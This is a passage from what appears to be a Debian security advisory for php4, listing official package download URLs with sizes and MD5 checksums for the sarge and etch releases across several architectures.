1592462 d2b164ee919bc236214b2116e99c700a\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-22_arm.deb\n Size/MD5 checksum: 3173416 f6591563486d623aa04851912d08166d\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-22_arm.deb\n Size/MD5 checksum: 1593044 3e4ce1ad458213a5aba438a0651605d9\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-22_arm.deb\n Size/MD5 checksum: 168910 dd1996c03744b730c9f86a51a9eeef13\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-22_arm.deb\n Size/MD5 checksum: 17656 0f73dfaefeead5628b3354cabfb787ed\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-22_arm.deb\n Size/MD5 checksum: 325550 40cf746cfc5d71f978d4158ebd105a7c\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-22_arm.deb\n Size/MD5 checksum: 36114 e0df4c0fa78c6ee5b83e203b10a5c2bf\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-22_arm.deb\n Size/MD5 checksum: 31782 9cc61fd12b573a63fc7d8fc035e8ba6d\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-22_arm.deb\n Size/MD5 checksum: 35462 3819cdd49a8f07c3d289c0a92de3268c\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-22_arm.deb\n Size/MD5 checksum: 19738 4269fa0c62738f975db65e025e97c9f0\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-22_arm.deb\n Size/MD5 checksum: 17088 56020e5c4d0fe2fa482e7948c348a45e\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-22_arm.deb\n Size/MD5 checksum: 7828 4b5afcea937eee89b4a4180c3e12aabe\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-22_arm.deb\n Size/MD5 checksum: 20606 6388dde1388aeb77ca91353e2cb6d50a\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-22_arm.deb\n Size/MD5 checksum: 27334 53a59cc94d128ab3cef868c1020f0220\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-22_arm.deb\n Size/MD5 checksum: 7654 7255002e8acc7d542251a57cc14ebc03\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-22_arm.deb\n Size/MD5 checksum: 12798 61a55d6f52cf2fc2b4e49f568be9b026\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-22_arm.deb\n Size/MD5 checksum: 20900 c7cbb9446442e67de79e4f5c950e4147\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-22_arm.deb\n Size/MD5 checksum: 15796 6d001e67642c6c2b0c058976db3cb99d\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-22_i386.deb\n Size/MD5 checksum: 1614348 b7e9671a31a898da1b4219c9b6185bbc\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-22_i386.deb\n Size/MD5 checksum: 1612354 9d108ee7b6f85ba2097e8b676529c9c3\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-22_i386.deb\n Size/MD5 checksum: 3209432 fb172effe3844f33b959219546070273\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-22_i386.deb\n Size/MD5 checksum: 1609704 4e876ed4ec3ff6b24af1624d303d2c7f\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-22_i386.deb\n Size/MD5 checksum: 168870 676b990017df9375e0ea1e3b4c1c67da\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-22_i386.deb\n Size/MD5 checksum: 17898 432a163c9c38c44b56d3f27824025a2c\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-22_i386.deb\n Size/MD5 checksum: 325160 3ac78abeaf7e06d7f28a40731e0e6a0e\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-22_i386.deb\n Size/MD5 checksum: 37234 03ff79a59154f66184d0fcf4e8a379aa\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-22_i386.deb\n Size/MD5 checksum: 32384 bdf0858fe4420e0cf60069bff264a41a\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-22_i386.deb\n Size/MD5 checksum: 37402 5c07a7052ac4f02447ad77b19464a603\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-22_i386.deb\n Size/MD5 checksum: 19950 b1fd1e18a808f5cb6d3a8f5479a5051c\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-22_i386.deb\n Size/MD5 checksum: 17668 c73e8db0b128547cc48c3a7c5774aa44\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-22_i386.deb\n Size/MD5 checksum: 8036 14dadeb2766bf4f19bf9baf963dc73a9\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-22_i386.deb\n Size/MD5 checksum: 21214 7a559e0f4fad6d665dddca9b11f6b63a\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-22_i386.deb\n Size/MD5 checksum: 27142 9d2d1eefc0b491c8fe9a751e67976e46\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-22_i386.deb\n Size/MD5 checksum: 7702 30d3f5bd63c502fe916d72f09f018239\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-22_i386.deb\n Size/MD5 checksum: 13154 fbe8760da5b8bcac850a9b252158bfca\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-22_i386.deb\n Size/MD5 checksum: 21378 162dbfd71fa586711386fff21f6f57d7\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-22_i386.deb\n Size/MD5 checksum: 16396 0e22226e9175a10a31c8c62e30b80896\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-22_ia64.deb\n Size/MD5 checksum: 1952606 a03204cf1cfd497be43c5db6fbab8529\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-22_ia64.deb\n Size/MD5 checksum: 1949926 066d4b0ff5aacc3a0c0525c890293f5e\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-22_ia64.deb\n Size/MD5 checksum: 3897044 32e37a9f61641825c74fc1b4464f8e93\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-22_ia64.deb\n Size/MD5 checksum: 1950756 8082fdf0aed1b71917c5b792bbd81be2\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-22_ia64.deb\n Size/MD5 checksum: 168876 551c98dd8fcabe1083ef0d71269b8888\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-22_ia64.deb\n Size/MD5 checksum: 22014 07adaf03e78755996b4ae22196d032fa\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-22_ia64.deb\n Size/MD5 checksum: 325184 75cbdd211c37b6f970d0c2f8692d6dc5\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-22_ia64.deb\n Size/MD5 checksum: 50634 a56e4bd145d908eb40077bb39e499237\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-22_ia64.deb\n Size/MD5 checksum: 45244 82b0f956bec8eabe936087bfc85b797d\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-22_ia64.deb\n Size/MD5 checksum: 48260 751164be6073f83f4a8ecfd5298b1d21\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-22_ia64.deb\n Size/MD5 checksum: 27028 4e3fe06ae35dd03c8e1640c89af22b2f\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-22_ia64.deb\n Size/MD5 checksum: 22644 bdbd777bb1947ef5a9049e3116283fa9\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-22_ia64.deb\n Size/MD5 checksum: 9316 5dc08966a63ef6876acbb17f065f7304\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-22_ia64.deb\n Size/MD5 checksum: 27588 29995ebe245f1783cfe2c83eacc24e9c\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-22_ia64.deb\n Size/MD5 checksum: 36164 b09a52d21f918c0ecc02df08b72f01d4\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-22_ia64.deb\n Size/MD5 checksum: 9002 5ee32a091cdcedaab03babaf00714244\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-22_ia64.deb\n Size/MD5 checksum: 16324 eb0678ddfc2e8723a575028eb8c01ede\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-22_ia64.deb\n Size/MD5 checksum: 28866 b97f3ba1ff0702f692bc3648d544bf30\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-22_ia64.deb\n Size/MD5 checksum: 21894 273ff0cbc2c04a27e55adbe42c81bbee\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-22_m68k.deb\n Size/MD5 checksum: 1580882 f4f13718246a7bfe8845ac47b59fdd28\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-22_m68k.deb\n Size/MD5 checksum: 1579076 a421b5d082b07afe03fbd382de9a6062\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-22_m68k.deb\n Size/MD5 checksum: 3081098 6afbc328072d1d38a738c4868a6a8d29\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-22_m68k.deb\n Size/MD5 checksum: 1551634 e710d0ee3764315a0c462cced15da798\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-22_m68k.deb\n Size/MD5 checksum: 168916 8a657c1ed11174ebfe90c42883e31cdf\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-22_m68k.deb\n Size/MD5 checksum: 18310 586ff3aedcfc092a8560dc92b38f242c\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-22_m68k.deb\n Size/MD5 checksum: 325796 7fced8608442819488c1128c829ad4d9\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-22_m68k.deb\n Size/MD5 checksum: 36512 e1817f4701e2a165ac954b0d2d8e40b4\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-22_m68k.deb\n Size/MD5 checksum: 31004 320e56bfcc4d2a4f2fa78e90c529ddd8\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-22_m68k.deb\n Size/MD5 checksum: 34928 b26e56fe8df70da287efed7f6b2c8abd\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-22_m68k.deb\n Size/MD5 checksum: 19128 e6c05a1206b8c7a365010935f491ca13\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-22_m68k.deb\n Size/MD5 checksum: 17808 7016c00e16cf7601dbc21e4650cb70c3\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-22_m68k.deb\n Size/MD5 checksum: 7960 5e5dbe17a6c7e1bc4a20a272f944789c\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-22_m68k.deb\n Size/MD5 checksum: 20684 c084ddf3005c96799e41c07c5d41a1af\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-22_m68k.deb\n Size/MD5 checksum: 25846 fff295ada3a5805d27d82d8fac354865\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-22_m68k.deb\n Size/MD5 checksum: 7670 c6f1d8f10560c888592dcc6f6fad08b4\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-22_m68k.deb\n Size/MD5 checksum: 12712 9ed391e533a62ff540aa8dafbabfa08d\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-22_m68k.deb\n Size/MD5 checksum: 20370 5636762ba6357480516df4c2ab24b80f\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-22_m68k.deb\n Size/MD5 checksum: 15878 9fb9a26c592dc40b5bae795b73639d43\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 1630964 0f3ced4b479d9c38c6c81b38a983ec9f\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 1629354 4a873448bea8c088735fb9597025d3f7\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 3255772 f38acb4ddc688673c5a0bcce7f965940\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 1631918 5d536a92bc5477efbd7d32558c7a45e7\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 168892 9d27bd1604fb1fd698a2f3801f3bf84d\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 16790 cfa54d1f9406e5346f2144469c5419eb\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 325312 2caaf4719a222437ec09f88dd414ee67\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 34774 9419d51a6ac86171b0d37803fe6c862e\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 31664 2b67b9203d8137b1adaeaa9d9e70e62d\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 33896 48fa23f2b75185f9139ee80b7834eb87\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 19802 3adea005443cf7f636aecb7f3ee73b92\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 16386 bcf93393b9a7e08969ae281a3e072d9e\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 8092 d11336219b5713c5bf3a651bd3d9f5b3\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 20448 9430960d561f7c21927707091a2123b1\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 26242 ac7d756c47d401af5c2b5e20b97732b8\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 7780 293fdeb98a4f1ce76e028e3ffeee5aef\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 13052 cec6af641a2d61fba78abe4563aa62ee\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 21594 4c0eedefc2e8c4473d25776cc8b193a1\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-22_mipsel.deb\n Size/MD5 checksum: 16164 e86989f7925a3e575c3cd73d590fd9b8\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-22_s390.deb\n Size/MD5 checksum: 1710016 f13d0a3da6b29f19227d0b354d4e26f4\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-22_s390.deb\n Size/MD5 checksum: 1709188 540218ad6511020b7add8f86d41565c3\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-22_s390.deb\n Size/MD5 checksum: 3361122 b05cd5e0f92448859979dddd0b54771e\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-22_s390.deb\n Size/MD5 checksum: 1687684 06814ada41c3c609115ad70f361cc2cc\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-22_s390.deb\n Size/MD5 checksum: 168880 e200ef0e76820184db398232e0a07666\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-22_s390.deb\n Size/MD5 checksum: 17842 ed202880713f3853368825f59c15a747\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-22_s390.deb\n Size/MD5 checksum: 325176 d8781f6fdde355d8e4654352dae2d1cd\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-22_s390.deb\n Size/MD5 checksum: 41124 ae416e5c43681062947e29b2b3891684\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-22_s390.deb\n Size/MD5 checksum: 33562 9245975ab28ecd4b5e42b94d9082d9fe\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-22_s390.deb\n Size/MD5 checksum: 37530 512c093d51c8bb6e65ac8f7b1e7684e1\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-22_s390.deb\n Size/MD5 checksum: 21410 fee2d754756a35b576e563ac63209718\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-22_s390.deb\n Size/MD5 checksum: 17726 f116192d4f48780adbb5eab6493d67a6\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-22_s390.deb\n Size/MD5 checksum: 8396 099162f0f5a78af74552365a67888282\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-22_s390.deb\n Size/MD5 checksum: 22934 177736b769e2be046934b0b29c66623d\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-22_s390.deb\n Size/MD5 checksum: 28870 b3ac728045ecee2d43ab1588cbe512f2\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-22_s390.deb\n Size/MD5 checksum: 8044 714bbdc3340443cbb5989152773deb45\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-22_s390.deb\n Size/MD5 checksum: 13896 32c3a0f7f7426018105fe2e517bec953\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-22_s390.deb\n Size/MD5 checksum: 22268 e180b9874a00d52f392f6b0687f61788\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-22_s390.deb\n Size/MD5 checksum: 17298 7be7d21bd4c3181eb3aa5a626f1d16b1\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-22_sparc.deb\n Size/MD5 checksum: 1623912 9309dbcb3aa5586a3c2eab922c2f9e55\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-22_sparc.deb\n Size/MD5 checksum: 1621300 52f73dfd5796a18babad40f11fd93cc8\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-22_sparc.deb\n Size/MD5 checksum: 3198744 a80b02ade50b0faeca427b985b743ef5\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-22_sparc.deb\n Size/MD5 checksum: 1607108 125e6d9db8b2ca788445d77c54df6126\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-22_sparc.deb\n Size/MD5 checksum: 168884 26c0076dfdbc24533e4f4ee91d7d7669\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-22_sparc.deb\n Size/MD5 checksum: 18072 b385e2bcdd30709d3a4f6ba97f026212\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-22_sparc.deb\n Size/MD5 checksum: 325258 47eaf5f870df33cd83167edde66c35bc\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-22_sparc.deb\n Size/MD5 checksum: 36488 5b7c76b235afc7c60692ea3cda2b467c\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-22_sparc.deb\n Size/MD5 checksum: 31948 83bf0be7368c8048438768da31b19112\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-22_sparc.deb\n Size/MD5 checksum: 36242 c017f8c8642d5de13bfac3da62bf0ce1\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-22_sparc.deb\n Size/MD5 checksum: 19270 7d3d43766cca6df506503767e4de016f\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-22_sparc.deb\n Size/MD5 checksum: 17490 712858ca5e0ed353333f8064deeb1839\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-22_sparc.deb\n Size/MD5 checksum: 7872 3f30717d0de066671b0dd3e0eff3deaa\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-22_sparc.deb\n Size/MD5 checksum: 20674 f240c37355d878346adbcfc7c2c38271\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-22_sparc.deb\n Size/MD5 checksum: 26532 bb0da54f19fdc49140047961310c4209\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-22_sparc.deb\n Size/MD5 checksum: 7596 075c70c7f98f417737c6291ca9c1a95c\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-22_sparc.deb\n Size/MD5 checksum: 12844 912b2877294f234c0bf71e2742b2fb8b\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-22_sparc.deb\n Size/MD5 checksum: 20848 194a95a419c96b578481bb33f0b331ca\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-22_sparc.deb\n Size/MD5 checksum: 15868 add2205e575b95c5a7a18665d8db304a\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/p/php4/php4_4.4.4-8+etch4.dsc\n Size/MD5 checksum: 2001 7b924e077ac34cbb57154292effc3436\n http://security.debian.org/pool/updates/main/p/php4/php4_4.4.4-8+etch4.diff.gz\n Size/MD5 checksum: 99294 1a5f3517c2babc868cbdcc7caa77c298\n http://security.debian.org/pool/updates/main/p/php4/php4_4.4.4.orig.tar.gz\n Size/MD5 checksum: 5555168 e884b9b7c2e936310553c946bc2f67c2\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/p/php4/php4-pear_4.4.4-8+etch4_all.deb\n Size/MD5 checksum: 1182 ac7e0e1d7ddf9477747d56db011756e7\n http://security.debian.org/pool/updates/main/p/php4/php4_4.4.4-8+etch4_all.deb\n Size/MD5 checksum: 1162 574a5e13465d5be6cc810b7ea18b1311\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 1685672 628197d6a8442051e6fd0daff15c61ea\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 1685872 1da9c548fdf31ab6709ad416e65c8e1e\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 3314002 5a0f7056124b3f3e96f7fa9908f319c3\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 1663910 d581dc8d0eb35c6602c7adf666fbf1f9\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 205002 8785651a4c853567f351031a0f5630e0\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 16068 ffab2e012a47406834ea9138341991a5\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 200812 78f4ade51155efbc152c125b5ca7d32f\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 37692 7333e4970fabe4118176c88a9f1a607c\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 32312 cbc69dbb0b5ba4de2f348e053c3bd3b7\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 35278 e3cd50fad1f9c7a434484e6c0e788b03\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 18698 530f5bc82db16e6b9f952148d3609ea2\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 14600 7fbe3bc58a9c2034c3c9ce8aba4c5c1d\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 13958 5d4eb6d627b73657e28b5fbc9a3029bc\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 5312 9261f1e37636f48eab08f7bd0651ba64\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 20542 f7930ce602254f1402c4258f38b95458\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 25456 f773badfa818a1a2ad142e5ea3f5f6f6\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 37338 94e49e9b91594a021545f4b8b132e819\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 8880 11b814d353357d7fc64c690e694884eb\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 5000 57c9f11b5515c28b1c9f8b67818cfead\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 10976 7d3291fce5056aaa8a85d19afa8de179\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 19644 68fbbf1ff0bfe5af79071c718a260679\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch4_alpha.deb\n Size/MD5 checksum: 14572 3159ff3778f59d95b811c84ee660ebeb\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 1647352 e70504f6e176e4731797e11c60f16697\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 1648418 cc659c87fb7caf41148beb1b7dd017db\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 3255352 3c37f35e4bb1d7bae68d71472a003d38\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 1635934 482df2d7510401381d35a9543405f7c2\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 205502 28978ea4cd0a4bbf0b9705fd2e54e3c8\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 15788 5cdaa3835546950d592cad972bb12f80\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 200628 7264a480ddd53087c52988a9f95c0513\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 39462 d71838aa68313c084ab685831281c959\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 32324 9dbb980c93a4dc3d99e0586b0aeefee9\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 35252 a2aecb5a06f2dccf4899254f46c0db08\n http://security.debian.org/pool/updates/main/p/php4/php4-interbase_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 24152 143ad6d418fe3bb9fdcb20ac169e97ca\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 18612 d60e2ace06fa224bdab79e511fdfa021\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 15610 12dd02d3874ce0879cd3598cdc61458d\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 14012 ae114ea857a43e1b588e18f364a88217\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 5234 fdd234b8eb9a496ff4c9379cfd26193c\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 20572 ab3c8ea527494d3f4f83812a26b678c5\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 26100 5910f1c50cbdd507b0dc0bb3cd8a5176\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 36016 809b346872d45a14bcac25981978d873\n 